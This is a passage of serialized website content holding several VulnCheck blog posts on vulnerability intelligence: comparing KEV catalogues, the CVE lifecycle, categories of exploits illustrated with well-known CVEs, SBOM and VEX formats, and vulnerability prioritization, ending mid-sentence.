Exploitation Evidence Availability Before CISA KEV (All CISA KEVs)",[18,60013,60014],{},[68,60015],{":width":10862,"alt":58618,"src":60016},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fcisa-kev-exploitation-availability.png",[18,60018,60019],{},"Next, we analyzed the time gap between vulnerabilities being added to CISA KEV and the availability of publicly documented exploitation evidence in VulnCheck KEV. By reviewing all historical CISA KEVs and mapping the dates of publicly available exploitation evidence.",[18,60021,60022],{},"Time Gap Insights: In 53.4% of cases, exploitation evidence is publicly available more than one month prior to the vulnerability being added to CISA KEV.",[18,60024,60025],{},"Same-Day Evidence: When exploitation evidence and CISA KEV updates coincide on the same day, it typically occurs during Patch Tuesday, when exploitation evidence is widely documented and known to be coming from reliable sources.",[18,60027,60028],{},"On occassion we see unique evidence published from CISA that wasn't available elsewhere which is a smaller subset of the 327 vulnerabilities in the same day evidence bucket.",[61,60030,60032],{"id":60031},"explore-vulncheck-kev-and-cisa-kev-yourself","Explore VulnCheck KEV and CISA KEV Yourself",[18,60034,60035],{},"The Jupyter Notebook used to generate this research is a free resource that uses VulnCheck’s Python SDK and community edition making it available to all.",[18,60037,60038],{},"Get started today",[1789,60040,60041,60047,60053,60060],{},[25,60042,60043],{},[47,60044,60046],{"href":40745,"rel":60045},[51],"Signup for VulnCheck Community",[25,60048,60049],{},[47,60050,60052],{"href":59920,"rel":60051},[51],"Download the Jupyter Notebook",[25,60054,60055],{},[47,60056,60059],{"href":60057,"rel":60058},"https:\u002F\u002Fdocs.vulncheck.com\u002Fgetting-started\u002Fapi-tokens",[51],"Enter your API key from VulnCheck",[25,60061,60062],{},"Make modifications and explore VulnCheck KEV and CISA KEV",[61,60064,202],{"id":201},[18,60066,205],{},[18,60068,208],{},[18,60070,211,60071,217],{},[47,60072,216],{"href":214,"rel":60073},[51],{"title":219,"searchDepth":220,"depth":220,"links":60075},[60076,60077,60078,60082,60083,60084,60085],{"id":3520,"depth":220,"text":20},{"id":59925,"depth":220,"text":59926},{"id":59943,"depth":220,"text":59944,"children":60079},[60080,60081],{"id":59950,"depth":1266,"text":59951},{"id":59968,"depth":1266,"text":59969},{"id":59986,"depth":220,"text":59987},{"id":60010,"depth":220,"text":60011},{"id":60031,"depth":220,"text":60032},{"id":201,"depth":220,"text":202},"2024-12-05",{"slug":60088},"comparing-kevs-jupyter","\u002Fblog\u002Fcomparing-kevs-jupyter",{"title":59877,"description":59888},"blog\u002Fcomparing-kevs-jupyter",[1280,1279],"07JjHsqgh-hpPfe4vs42ZVl4WtWQPcAwM3XLRnnp9D0",{"id":60095,"title":60096,"articles":7,"authors":60097,"body":60099,"date":60252,"description":60253,"extension":234,"image":7,"link":7,"meta":60254,"navigation":237,"path":60256,"seo":60257,"series":60258,"stem":60259,"subtype":7,"tags":60260,"__hash__":60261},"blog\u002Fblog\u002Fcommon-vulnerabilities-and-exposures.md","Common Vulnerabilities and Exposures",[60098],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":60100,"toc":60250},[60101,60104,60107,60115,60156,60164,60204,60212,60238,60245,60248],[18,60102,60103],{},"Identifying and managing vulnerabilities effectively is one of the most crucial steps in reducing risk and maintaining effective protection from emerging threats. The Common Vulnerabilities and Exposures (CVE) program plays an essential role in this effort by providing a standardized identification system for vulnerabilities, enabling organizations worldwide to track and address threats consistently.",[18,60105,60106],{},"The CVE system was established in 1999 by MITRE Corporation, with the goal of creating a universal, standardized identifier for software vulnerabilities. For organizations, CVEs facilitate consistent tracking, reporting, and communication around vulnerabilities across different teams and security products. The CVE system ensures that the industry speaks a common language when discussing vulnerabilities, from security advisories to patching efforts.",[18,60108,60109,60112,60114],{},[295,60110,60111],{},"The CVE Lifecycle",[1823,60113],{},"\nThe lifecycle of a CVE entry spans several stages, from initial identification to eventual publication. Here’s a breakdown of each stage:",[22,60116,60117,60123,60132,60138,60144,60150],{},[25,60118,60119,60122],{},[295,60120,60121],{},"Discover and Report:"," Vulnerabilities are identified by a wide range of sources, including independent security researchers, vendors, and even security-conscious individuals. Once a vulnerability is identified, a report is submitted to a CVE Numbering Authority (CNA) for assessment and processing.",[25,60124,60125,60128,60129,60131],{},[295,60126,60127],{},"Assignment and Validation",": CVE Numbering Authorities, or CNAs, are organizations authorized to assign CVE IDs to vulnerabilities within a specific scope, typically the organization’s own products. Once a vulnerability report is received, the CNA vets the report, and if necessary reserves a CVE ID for the new vulnerability. ",[1823,60130],{}," The vulnerability is then fully reviewed and validated, ensuring the scope of the vulnerability is properly understood. If the vulnerability is deemed not to have merit, the CVE ID will be marked as rejected. The CNA typically also begins development of a patch for the vulnerability, which can take some time depending on the nature of the vulnerability and the risk of in-the-wild exploitation.",[25,60133,60134,60137],{},[295,60135,60136],{},"Submission and Publication:"," Once all the above steps are completed the CNA submits all relevant details through MITRE and the CVE record is published to the public CVE list. At this point the vulnerability is available to security vendors and organizations around the world.",[25,60139,60140,60143],{},[295,60141,60142],{},"Enrichment",": Published CVEs are imported into NIST’s National Vulnerability Database, where they are further enriched. NVD enrichment adds additional context including official designations for platforms that the vulnerability affects, category for the vulnerability, and standardized severity scores for the vulnerability. The time for this enrichment can vary significantly, depending on the availability of reference material as well as the CVE backlog at the time of publication.",[25,60145,60146,60149],{},[295,60147,60148],{},"Exploitation:"," If evidence of active exploitation surfaces for a published CVE vulnerability, it’s important to communicate this to the security community to assist with prioritization of remediation efforts. CISA maintains the Known Exploited Vulnerabilities (KEV) list to serve this purpose. CISA relies on reports from a variety of community sources, as well as their own internal monitoring and open-source research. Once CISA is aware of a new exploitation, the KEV is typically updated within 24 hours, but it’s not uncommon for an exploit to be in use in-the-wild for days or weeks before a CISA notification.",[25,60151,60152,60155],{},[295,60153,60154],{},"Updates:"," CVE records may be updated over time, as additional details become available, such as updated severity ratings or additional references. Updates are submitted through a similar process to the original CVE, and are validated by the relevant CNA.",[18,60157,60158,60161,60163],{},[295,60159,60160],{},"What information is included in a CVE?",[1823,60162],{},"\nOnce a CVE record is published and enriched via the NVD, it typically includes the following key pieces of information:",[22,60165,60166,60171,60176,60181,60187,60193,60199],{},[25,60167,60168,60170],{},[295,60169,2757],{},": A unique identifier for the vulnerability, following a standardized format like \"CVE-YYYY-NNNNN,\" where “YYYY” represents the year the CVE ID was initially reserved, and “NNNNN” is a 5-digit identifier.",[25,60172,60173,60175],{},[295,60174,10625],{},": A concise summary of the vulnerability, including affected products and general information about the nature of the issue. The description provides enough information to identify the issue without delving into technical detail or exploit specifics.",[25,60177,60178,60180],{},[295,60179,2850],{},": Links to additional resources, advisories, or vendor statements that provide further details about the vulnerability.",[25,60182,60183,60186],{},[295,60184,60185],{},"Affected Products and Versions",": A list of specific products, software versions, or platforms impacted by the vulnerability. This information is shared in Common Platform Enumeration (CPE) format, which provides an unambiguous, structured naming scheme for the affected products.",[25,60188,60189,60192],{},[295,60190,60191],{},"Weakness Enumeration",": Weakness enumeration helps organizations to understand the general class or nature of the vulnerability. Common Weakness Enumeration (CWE). is used to categorize the type of vulnerability (e.g., CWE-79 for cross-site scripting or CWE-89 for SQL injection).",[25,60194,60195,60198],{},[295,60196,60197],{},"Severity and Scoring",": CVE records include a severity score, usually in the form of a CVSS (Common Vulnerability Scoring System) rating provided by the NVD. The CVSS score gives a numerical rating for the severity of the vulnerability, helping teams prioritize based on factors like impact and exploitability.",[25,60200,60201,60203],{},[295,60202,31643],{},": If there are known in-the-wild exploits of a vulnerability, vulnerability is listed on CISA’s Known Exploited Vulnerabilities (KEV) list, and an appropriate note is appended to the CVE record..",[18,60205,60206,60209,60211],{},[295,60207,60208],{},"Challenges in Using CVEs",[1823,60210],{},"\nDespite the essential role CVEs play, relying solely on CVE information can introduce several challenges in vulnerability management:",[22,60213,60214,60220,60226,60232],{},[25,60215,60216,60219],{},[295,60217,60218],{},"Incompleteness and Delays",": While the CVE database is extensive, it is not exhaustive. Many vulnerabilities go unlisted, often due to resource limitations or prioritization of high-impact vulnerabilities by CNAs. Additionally, delays in CVE assignment—especially with zero-day vulnerabilities—can leave organizations with a dangerous gap in their threat intelligence. These delays are exacerbated by the multiple parties involved in documenting a CVE, including the CNA, MITRE, NVD, and CISA.",[25,60221,60222,60225],{},[295,60223,60224],{},"Data Quality and Consistency Issues",": CVE entries can vary widely in the level of detail provided, with some entries offering minimal information. This inconsistency can create confusion when teams try to assess the risk posed by a vulnerability, as they may lack essential context to understand its true impact.",[25,60227,60228,60231],{},[295,60229,60230],{},"Contextual Limitations",": CVEs focus on providing identifiers and basic vulnerability details, but lack exploitability information that many organizations need to prioritize effectively. Knowing that a vulnerability exists is not always enough; teams need contextual details like exploit availability, threat actor activity, and environmental relevance to determine whether immediate action is warranted.",[25,60233,60234,60237],{},[295,60235,60236],{},"Volume and Prioritization:"," With tens of thousands of CVEs published each year, the sheer volume can be overwhelming. Without additional context, security teams can struggle to identify which vulnerabilities are most critical to their environment, leading to a “patch everything” mindset that is neither efficient nor sustainable.",[18,60239,60240,60242,60244],{},[295,60241,1903],{},[1823,60243],{},"\nUnderstanding and utilizing the CVE system is essential for effective vulnerability management, but CVEs alone often do not provide the full picture. The challenges posed by CVE data—such as delays, lack of contextual detail, and overwhelming volume—highlight the need for supplemental intelligence that provides a deeper, more accurate perspective on vulnerabilities.",[18,60246,60247],{},"Solutions like VulnCheck enhance vulnerability data with critical exploit and threat intelligence in near real time, empowering organizations to prioritize vulnerabilities based on real-world risk. By augmenting CVE data with VulnCheck Exploit Intelligence, security teams can act faster and maintain a proactive approach in a rapidly-evolving threat landscape.",[44317,60249],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60251},[],"2024-12-04","Exploit Intel 101 - Common Vulnerabilities and Exposures (CVE)",{"slug":60255},"common-vulnerabilities-and-exposures","\u002Fblog\u002Fcommon-vulnerabilities-and-exposures",{"title":60096,"description":60253},{"title":41489,"color":41490,"icon":41491},"blog\u002Fcommon-vulnerabilities-and-exposures",[41494],"Hm88G05Z8cYryFN_tXaTVKjR9LEt9LkTHPFQcgRu_Yc",{"id":60263,"title":60264,"articles":7,"authors":60265,"body":60267,"date":60252,"description":60400,"extension":234,"image":7,"link":7,"meta":60401,"navigation":237,"path":60403,"seo":60404,"series":60405,"stem":60406,"subtype":7,"tags":60407,"__hash__":60408},"blog\u002Fblog\u002Funderstanding-exploits.md","Understanding Exploits",[60266],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":60268,"toc":60393},[60269,60278,60281,60284,60290,60293,60301,60307,60310,60318,60323,60326,60337,60343,60346,60354,60360,60363,60371,60377,60380,60388,60391],[18,60270,60271,60272,60277],{},"An exploit is a technique, code, or a set of commands that an attacker uses to take advantage of a vulnerability in a system, application, or network. Exploits are one of the most prevalent techniques attackers use to gain unauthorized access, exfiltrate data, disrupt operations, or escalate privileges within a target environment. According to ",[47,60273,60276],{"href":60274,"rel":60275},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fen-gb\u002Fresources\u002Freports\u002F2024\u002Fdbir\u002F2024-dbir-data-breach-investigations-report.pdf",[51],"Verizon’s 2024 Data Breach Investigation Report",", 2024 saw a 180% increase in the use of exploits in the early stages of successful breaches.",[18,60279,60280],{},"Exploits vary in form and impact; some are simple commands that reveal minor data leaks, while others might involve complex, custom tailored software that fully compromises a system. Understanding exploits and their potential impact is essential for defending against modern cyberattacks and prioritizing responses.",[18,60282,60283],{},"The overall impact and accessibility of exploits can vary greatly depending on the nature of the underlying vulnerability being exploited. Let’s review the most common exploit categories and the impact of some real-world examples.",[993,60285,60287],{"id":60286},"_1-initial-access-exploits",[295,60288,60289],{},"1. Initial Access Exploits",[18,60291,60292],{},"Initial Access exploits allow attackers to gain unauthorized remote access to a system without needing credentials. Often referred to as Remote Code Execution (RCE) exploits, these enable attackers to execute arbitrary code on a target system, leading to full system compromise. Because they provide an initial foothold, Initial Access exploits are among the most critical types for organizations to defend against, as they open the door for attackers to deploy malware, establish backdoors, and move laterally across a network. The risk is heightened by the fact that these exploits often allow attackers to operate without direct user interaction, making detection and defense particularly challenging.",[22,60294,60295],{},[25,60296,60297,60300],{},[295,60298,60299],{},"Example: Microsoft Exchange ProxyLogon (CVE-2021-26855)",": Disclosed in March 2021, this vulnerability became a major entry point for Chinese-affiliated advanced persistent threat (APT) group Hafnium and other APT actors. ProxyLogon allowed remote attackers to gain full control over Microsoft Exchange servers without authentication, and it was commonly used to implant web shells for persistent access. The attacks targeted multiple sectors around the globe, including government, healthcare, education, and the private sector. Within weeks of the vulnerability’s disclosure, reports estimated that 10s of thousands of organizations were compromised, incurring substantial costs for detection, containment, and remediation.",[993,60302,60304],{"id":60303},"_2-remote-with-credentials-exploits",[295,60305,60306],{},"2. Remote with Credentials Exploits",[18,60308,60309],{},"Remote with Credentials exploits are a category of exploit where unauthorized remote access to a target system is possible, but requires valid user credentials. Attackers who acquire login credentials through techniques like phishing or credential stuffing can leverage these exploits to access network-bound applications or systems. These exploits can allow an adversary to achieve extensive control over a system or application, but the requirement for credentials complicates the exploitation process, somewhat mitigating the associated risk.",[22,60311,60312],{},[25,60313,60314,60317],{},[295,60315,60316],{},"Example: Cisco's IOS XE Web UI vulnerability (CVE-2023-20273)",": This vulnerability in the Cisco IOS embedded management system allows a remote, authenticated attacker to execute commands with root privileges on affected devices. In September 2023 Cisco reported that threat actors exploited this vulnerability to escalate privileges and to deploy the \"BadCandy\" implant, a backdoor web shell that provided attackers with deep and persistent access to compromised networks even after the vulnerability was patched.",[18,60319,60320],{},[295,60321,60322],{},"3. Local Exploits",[18,60324,60325],{},"Local exploits require attackers to have direct access to the target system and typically involve privilege escalation vulnerabilities. These exploits are often used to elevate privileges once an attacker has already gained a foothold in the system, enabling them to access restricted areas or sensitive data. Local exploits play a critical role in multi-stage attacks, where attackers first gain limited access, perhaps through phishing or other social engineering, and then use local exploits to deepen their control. Although they require some level of access to begin with, local exploits can significantly escalate an attack’s damage potential by broadening attacker privileges.",[22,60327,60328],{},[25,60329,60330,20051,60333,60336],{},[295,60331,60332],{},"Example",[295,60334,60335],{},"Linux Kernel Dirty Pipe vulnerability (CVE-2022-0847):"," This vulnerability allowed attackers with basic user privileges on a Linux system to escalate their access, effectively enabling them to write to read-only files and gain root-level privileges. The Dirty Pipe vulnerability quickly drew attention as it affected a wide range of Linux distributions and devices, including those widely used in enterprise environments. Threat actors targeted cloud environments and shared systems where local privilege escalation could provide critical advantages, allowing them to access sensitive data or disrupt services.",[993,60338,60340],{"id":60339},"_4-client-side-exploits",[295,60341,60342],{},"4. Client-Side Exploits",[18,60344,60345],{},"Client-side exploits target end-user applications, such as web browsers, email clients, or common office productivity software. These exploits are often triggered when a user interacts with malicious content, such as by opening a document or clicking a link. Client-side exploits are particularly effective in targeted attacks, where attackers can deliver malicious payloads to users of vulnerable applications. The damage from these exploits can vary based on the application’s security settings and the level of user privileges. They often serve as an initial foothold, enabling attackers to breach enterprise environments or gain access to sensitive data.",[22,60347,60348],{},[25,60349,60350,60353],{},[295,60351,60352],{},"Example: Follina (CVE-2022-30190)",": This vulnerability in Microsoft’s Support Diagnostic Tool (MSDT) allowed attackers to execute arbitrary code by tricking users into opening specially-crafted Microsoft Word documents. Exploited by various threat actors, including APT groups, Follina was employed in phishing campaigns aimed at sectors such as government, finance, and healthcare, where it was used to deliver malware and establish footholds in networks with high-value targets.",[993,60355,60357],{"id":60356},"_5-infoleak-exploits",[295,60358,60359],{},"5. Infoleak Exploits",[18,60361,60362],{},"Information leak (Infoleak) exploits allow attackers to access sensitive data without authorization. These exploits are typically used to extract information such as encryption keys, memory contents, or login credentials, which attackers can then use to support further exploitation or surveillance. Infoleak exploits are particularly dangerous in shared or multi-tenant environments, where exposed data can compromise multiple users or organizations.",[22,60364,60365],{},[25,60366,60367,60370],{},[295,60368,60369],{},"Example: Spectre-BHB (CVE-2022-23960):"," This vulnerability affected several modern CPU architectures, allowing attackers to bypass memory isolation protections and access sensitive information stored in protected memory areas. Spectre-BHB posed a severe risk in cloud and virtualized environments, where it could enable attackers to access data across virtual machines in shared infrastructure.",[993,60372,60374],{"id":60373},"_6-denial-of-service-dos-exploits",[295,60375,60376],{},"6. Denial of Service (DoS) Exploits",[18,60378,60379],{},"Denial of Service (DoS) exploits aim to disrupt a target service or application, often by overwhelming resources or forcing system crashes. These exploits don’t provide unauthorized access, but they can cause significant operational disruptions. The impact of DoS exploits is often measured in terms of downtime, loss of revenue, and reputational damage, making them especially concerning in industries that rely heavily on continuous service availability.",[22,60381,60382],{},[25,60383,60384,60387],{},[295,60385,60386],{},"Example: SACK Panic (CVE-2019-11477):"," This vulnerability in the Linux kernel’s TCP stack affects the handling of TCP Selective Acknowledgement (SACK) packets. Specifically, it allows attackers to send crafted SACK packets with a low Maximum Segment Size (MSS), which can trigger a kernel panic and crash the system. Shortly after disclosure, scans and exploitation attempts targeting this vulnerability were observed, particularly against Linux servers in cloud and hosting environments.",[18,60389,60390],{},"The distinctions among exploit types are critical for prioritizing vulnerability remediation. From Initial Access exploits that provide attackers with system entry points to Infoleak and Denial-of-Service exploits that create operational challenges, each type requires tailored mitigation strategies. Understanding these nuances empowers cybersecurity teams to better allocate resources, strengthen defenses, and reduce risks in an increasingly complex threat landscape.",[44317,60392],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60394},[60395,60396,60397,60398,60399],{"id":60286,"depth":1266,"text":60289},{"id":60303,"depth":1266,"text":60306},{"id":60339,"depth":1266,"text":60342},{"id":60356,"depth":1266,"text":60359},{"id":60373,"depth":1266,"text":60376},"Exploit Intel 101 - Understanding Exploits",{"slug":60402},"understanding-exploits","\u002Fblog\u002Funderstanding-exploits",{"title":60264,"description":60400},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-exploits",[41494],"XHIf3UvW97fxB9Lx6SDKEQkI-Z7CUCeD4AFh3soAfH4",{"id":60410,"title":60411,"articles":7,"authors":60412,"body":60414,"date":60252,"description":60503,"extension":234,"image":7,"link":7,"meta":60504,"navigation":237,"path":60506,"seo":60507,"series":60508,"stem":60509,"subtype":7,"tags":60510,"__hash__":60511},"blog\u002Fblog\u002Fvulnerability-exchange-formats.md","Vulnerability Exchange Formats - CycloneDX, SPDX, VDR, and VEX",[60413],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":60415,"toc":60496},[60416,60419,60422,60426,60429,60433,60436,60439,60442,60446,60449,60452,60456,60459,60462,60466,60469,60472,60480,60483,60486,60494],[18,60417,60418],{},"Modern software is made up of a massive, interconnected web of components, with applications relying heavily on open-source libraries, third-party dependencies, and complex supply chains. This complexity creates challenges for organizations looking to track the software that’s deployed across their networks, as well as to prioritize and remediate vulnerabilities embedded within.",[18,60420,60421],{},"Understanding, prioritizing, and remediating modern vulnerabilities is far too complicated to accomplish via spreadsheets or other disconnected, manual workflows. Most organizations of any size benefit greatly from integrating and automating as much of the process as possible. In this article we’ll explore a number of standard machine-readable data formats for vulnerability data, how they are used, and how they interact to automate and improve security across the software supply chain.",[61,60423,60425],{"id":60424},"software-bill-of-materials-sbom","Software Bill of Materials (SBOM)",[18,60427,60428],{},"A Software Bill of Materials, or SBOM, serves as the foundation for understanding the components within a piece of software. SBOMs provide the \"ingredient list\" of an application by enumerating all libraries, dependencies, and modules, giving organizations critical visibility into their software supply chain. This transparency enables them to identify risks, track vulnerabilities, and ensure compliance with licensing requirements. SBOMs are designed to work with automated tools, thanks to their machine-readable formats. Two leading SBOM standards, CycloneDX and SPDX, are widely used.",[61,60430,60432],{"id":60431},"cyclonedx-a-security-focused-sbom-format","CycloneDX: A Security-Focused SBOM Format",[18,60434,60435],{},"CycloneDX was developed by OWASP, a global non-profit organization dedicated to improving security of web applications and other software. This SBOM standard was specifically designed with security in mind, making it a powerful tool for tracking vulnerabilities and dependencies. CycloneDX supports machine-readable formats such as JSON and XML, which enable easy integration into automated security workflows.",[18,60437,60438],{},"One of CycloneDX’s key strengths is its detailed support for dependency relationships. It not only lists software components, but also maps how they depend on each other, making it easier to assess the ripple effects of a vulnerability. For example, if a deeply nested dependency in your software stack is affected by a critical vulnerability, CycloneDX’s structure ensures this risk is surfaced clearly.",[18,60440,60441],{},"Additionally, CycloneDX has been widely adopted in DevSecOps pipelines, where it helps organizations improve security at the earliest stages in the software development lifecycle. By generating SBOMs during the development process, teams can identify vulnerable modules before software is deployed.",[61,60443,60445],{"id":60444},"software-package-data-exchange-spdx-a-flexible-and-open-sbom-standard","Software Package Data Exchange (SPDX): A Flexible and Open SBOM Standard",[18,60447,60448],{},"The Linux Foundation maintains SPDX (Software Package Data Exchange), an international open standard originally created to manage software license compliance. Over time, it has evolved into a comprehensive SBOM standard used for both licensing and security purposes. One of SPDX’s greatest strengths is its flexibility: it supports multiple formats, including JSON, YAML, RDF, and tag\u002Fvalue, making it highly adaptable to a variety of environments.",[18,60450,60451],{},"SPDX has been embraced by open-source projects and enterprises alike. It is especially valuable for organizations managing large software ecosystems with diverse licensing requirements. Its compatibility with automated tools ensures that security and compliance checks can scale with the complexity of modern applications.",[61,60453,60455],{"id":60454},"vulnerability-disclosure-reports-vdr","Vulnerability Disclosure Reports (VDR)",[18,60457,60458],{},"When a new vulnerability is confirmed in a piece of software or hardware, it’s important to communicate it quickly and clearly to the broader community so defenders can take action. A Vulnerability Disclosure Report (VDR) formalizes this process, offering essential details such as the nature of the vulnerability, the affected systems or software versions, and remediation steps.",[18,60460,60461],{},"VDRs are typically published by vendors or service providers alongside the relevant SBOM for their product and its dependencies, and is updated over time as new vulnerabilities emerge. A VDR for a piece of software captures known vulnerabilities that affect it, along with descriptions and suggested plans for addressing them, in a machine-readable format. Incorporating VDRs into vulnerability management processes allows security teams to quickly understand and manage their baseline exposure.",[61,60463,60465],{"id":60464},"vulnerability-exploitability-exchange-vex","Vulnerability Exploitability Exchange (VEX)",[18,60467,60468],{},"Not all vulnerabilities are equally dangerous, and not all require immediate action. The Vulnerability Exploitability Exchange (VEX) standard addresses this by answering a critical question: Is a given vulnerability exploitable in a specific environment? While an SBOM and VDR can help to identify vulnerabilities present within a system, a VEX report provides the context needed to prioritize remediation efforts.",[18,60470,60471],{},"VEX reports are structured to map vulnerabilities to specific configurations or deployment scenarios. For instance, a vulnerability might exist in a library but be rendered non-exploitable because the affected feature is not used in the application, or due to environmental conditions. By providing this clarity, VEX reports help organizations focus their resources on risks that matter most.",[18,60473,60474,60477,60479],{},[295,60475,60476],{},"Bringing It All Together",[1823,60478],{},"\nSBOMs, VDRs, and VEX reports address different but interconnected stages of the vulnerability management lifecycle, forming a cohesive framework for identifying, analyzing, and prioritizing software vulnerabilities. Together, they provide a robust system for understanding risks and responding effectively.",[18,60481,60482],{},"Consider a scenario like the Log4j vulnerability (CVE-2021-44228). When the vulnerability was disclosed, security teams relied on VDRs for detailed information about its impact and affected versions of software they had deployed in their organizations. With an SBOM in hand, organizations could autonomously identify whether their applications included a vulnerable library, either directly or as a nested dependency.",[18,60484,60485],{},"For those affected, correlating with VEX reports provided crucial insights into whether the vulnerability was exploitable, immediately highlighting the applications that were at most risk, and in the most need of remediation. Together, these standards enable a streamlined, automated approach to managing vulnerabilities, reducing the time between discovery and resolution.",[18,60487,60488,60491,60493],{},[295,60489,60490],{},"Standards Help Build Resilience Through Automation",[1823,60492],{},"\nIn an era where vulnerability exploits are rapidly on the rise, SBOMs, VDRs, and VEX reports are indispensable tools for streamlining vulnerability management. Their machine-readable nature enables automation, driving scalable and effective vulnerability management even in large and complex environments. By adopting and integrating these formats into their vulnerability management workflows, organizations can strengthen their security posture, reduce risk, and build resilience against ever-evolving threats.",[44317,60495],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60497},[60498,60499,60500,60501,60502],{"id":60424,"depth":220,"text":60425},{"id":60431,"depth":220,"text":60432},{"id":60444,"depth":220,"text":60445},{"id":60454,"depth":220,"text":60455},{"id":60464,"depth":220,"text":60465},"Exploit Intel 101 - Vulnerability Exchange Formats (CycloneDX, SPDX, VDR, and VEX)",{"slug":60505},"vulnerability-exchange-formats","\u002Fblog\u002Fvulnerability-exchange-formats",{"title":60411,"description":60503},{"title":41489,"color":41490,"icon":41491},"blog\u002Fvulnerability-exchange-formats",[41494],"0sIjSJ00xL_lzBkcDPMLwrPcKFjuN8V8vg7h2lflOrE",{"id":60513,"title":60514,"articles":7,"authors":60515,"body":60517,"date":60252,"description":60703,"extension":234,"image":7,"link":7,"meta":60704,"navigation":237,"path":60706,"seo":60707,"series":60708,"stem":60709,"subtype":7,"tags":60710,"__hash__":60711},"blog\u002Fblog\u002Fvulnerability-prioritization-101.md","Vulnerability Prioritization",[60516],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":60518,"toc":60701},[60519,60522,60525,60533,60567,60570,60573,60631,60639,60665,60673,60676,60696,60699],[18,60520,60521],{},"Organizations face ever-growing numbers of security vulnerabilities, driven by the explosion in applications, increasing number of security researchers, and threat actor activity. Defenders often face a backlog of hundreds of thousands of known vulnerabilities; attempting to address all of these vulnerabilities is inefficient, expensive, and can lead to fatigue within security teams. Smart organizations must make strategic decisions about which vulnerabilities to patch today, which can wait for tomorrow, and what might be deferred indefinitely.",[18,60523,60524],{},"In practice only 2-5% of known vulnerabilities are ever exploited by attackers. By focusing on high-risk vulnerabilities, those most likely to be exploited and with the greatest potential impact, organizations can minimize their exposure to attacks while also making the best use of available resources. Effective Vulnerability Prioritization improves overall security while also optimizing resource allocation, allowing security teams to handle the most significant threats efficiently.",[18,60526,60527,60530,60532],{},[295,60528,60529],{},"What factors affect Vulnerability Prioritization?",[1823,60531],{},"\nWhen assessing risk of any particular vulnerability there are multiple factors to consider that impact risk, including inherent characteristics of the vulnerability itself, external factors such as threat attacker activity, and other factors such as internet exposure of the vulnerability, mitigating security controls and patching cadence. Some of the most impactful factors include:",[22,60534,60535,60541,60547,60552,60555,60561],{},[25,60536,60537,60540],{},[295,60538,60539],{},"Known Exploited Vulnerabilities (KEV)."," A Known Exploited Vulnerability is a one with confirmed exploitation evidence. Depending on the asset context, these should be treated with urgency and remediated as soon as possible.. The importance of remediating Known Exploited Vulnerabilities is underscored by CISA’s BOD 22-01, which mandates federal agencies address such vulnerabilities. CISA states, “Known exploited vulnerabilities should be the top priority for remediation.”",[25,60542,60543,60546],{},[295,60544,60545],{},"Ransomware Campaigns",". Vulnerabilities used in ransomware campaigns are often prioritized due to their widespread impact.",[25,60548,60549,60551],{},[295,60550,44260],{},", Vulnerabilities exploited by botnets, a collection of infected computers controlled by a common attacker, are critical to address.",[25,60553,60554],{},"Threat Actors: Specific vulnerabilities exploited by known threat actors pose increased risks and should be prioritized.",[25,60556,60557,60560],{},[295,60558,60559],{},"Weaponized Vulnerabilities."," Weaponized vulnerabilities are those with explicit malicious intent or reported exploitation. These include exploits within malware or those facilitating easy exploitation (Projects such as: MetaSploit, VulnCheck IAI, CANVAS, Core Impact). Weaponized exploits often have secondary payloads, droppers, or implants.",[25,60562,60563,60566],{},[295,60564,60565],{},"Proof of Concept (POC) exploit code"," demonstrates exploitation and indicates risk. POC exploits, such as blog posts, curl requests, or Python scripts, are often used in real-world attacks. The number of POC exploits associated with a vulnerability correlates with its likelihood of being weaponized or exploited.",[18,60568,60569],{},"There are additional factors to consider. Incorporating these factors within decision-based frameworks like Stakeholder-Specific Vulnerability Categorization (SSVC) can help build decision based logic for prioritizing vulnerabilities. Often, vulnerability attributes beyond threat intelligence can help provide further visibility into the risk a vulnerability might pose. Attributes such as CVSS metrics, CAPEC, CWE, MITRE ATT&CK, threat actors, targeted industries, targeted countries, and categorizations are frequently used by VulnCheck customers to determine the risk a vulnerability poses within their environment.",[18,60571,60572],{},"Beyond exploitation evidence, consider asking the following questions: Is the device\u002Fapplication connected to the internet? Is the device\u002Fapplication used for initial access? Is the device\u002Fapplication controlled by a user and susceptible to phishing attacks? Is the vulnerability remotely exploitable? Is the vulnerability automatable? Is the vulnerability reachable? Are there mitigations in place for the vulnerability?",[22,60574,60575,60584,60593,60599,60605],{},[25,60576,60577,60580,60581,60583],{},[295,60578,60579],{},"Known exploit availability and maturity."," Vulnerabilities with known exploits represent a much more immediate risk than vulnerabilities that have not been exploited, and deserve higher prioritization. However, not all exploits are created equal. It’s critical not only to know if an exploit exists, but also to capture its overall maturity. A proof-of-concept circulated by a security researcher is a good warning that the vulnerability could be weaponized by future attackers, but does not itself represent an immediate existential threat. On the other hand, exploits that are known to be circulating in widely available exploit kits or dark forums pose more significant risks. These known exploits increase the urgency for patching, as they provide low-skill adversaries with packaged tools needed in order to exploit vulnerabilities.",[1823,60582],{},"Insights on known exploits can be found in a variety of locations, such as CISA’s Known Exploited Vulnerabilities (KEV) list and Exploit-DB. Unfortunately these sources are often incomplete or lag behind real-world activity. As a result, many security teams augment these lists with their own independent research in order to ensure they have all the intelligence they need in order to prioritize effectively every hour of every day..",[25,60585,60586,60589,60590,60592],{},[295,60587,60588],{},"Vulnerability severity",". Severity is often the first consideration in prioritization. Typically based on Common Vulnerability Scoring System (CVSS) scores, severity provides a starting point, categorizing vulnerabilities from low to critical on a scale of 1-10.",[1823,60591],{},"CVSS scores are a core part of every CVE record, and while essential, CVSS alone does not provide enough context for effective prioritization. CVSS scores provide an indication of the potential risk associated with a vulnerability, but do not capture real world risk, as they don’t account for an organization’s specific environment or the likelihood of active exploitation. CVSS temporal scoring can offer an adjustment to a vulnerabilities score based on threat intelligence enrichment.",[25,60594,60595,60598],{},[295,60596,60597],{},"Likelihood of exploitation",".\nThe Exploit Prediction Scoring System (EPSS) is a framework designed to estimate the likelihood of a vulnerability being exploited in the wild. It combines various factors, such as the characteristics of vulnerabilities and historical exploit data to produce a probabilistic exploitability score.",[25,60600,60601,60604],{},[295,60602,60603],{},"Asset value and criticality."," Not all systems are equal in importance. Prioritization 